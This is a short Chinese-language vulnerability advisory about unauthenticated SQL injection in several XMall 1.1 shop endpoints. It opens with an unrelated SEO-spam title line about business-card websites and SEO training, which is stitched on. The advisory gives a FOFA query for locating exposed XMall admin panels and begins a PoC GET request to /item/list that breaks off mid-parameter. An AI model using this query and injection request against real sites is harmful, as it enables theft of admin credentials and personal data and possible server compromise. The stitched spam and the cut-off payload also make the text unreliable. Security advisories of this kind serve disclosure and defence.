可以做來電名片的網(wǎng)站seo高端培訓(xùn)
0x01 產(chǎn)品簡介
XMall 開源電商商城 是開發(fā)者Exrick的一款基于SOA架構(gòu)的分布式電商購物商城 前后端分離 前臺商城:Vue全家桶 后臺管理:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等。
0x02 漏洞概述
XMall 開源商城 /item/list、/item/listSearch、/sys/log、/order/list、/member/list 、/member/list/remove等多處接口存在SQL注入漏洞,未經(jīng)身份驗證的攻擊者可以利用 SQL 注入漏洞獲取數(shù)據(jù)庫中的信息(例如,管理員后臺密碼、站點的用戶個人信息)之外,甚至在高權(quán)限的情況可向服務(wù)器中寫入木馬,進一步獲取服務(wù)器系統(tǒng)權(quán)限。
0x03 影響范圍
xmall | 1.1版本 |
0x04 復(fù)現(xiàn)環(huán)境
FOFA:app="XMall-后臺管理系統(tǒng)"
0x05 漏洞復(fù)現(xiàn)
PoC
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=d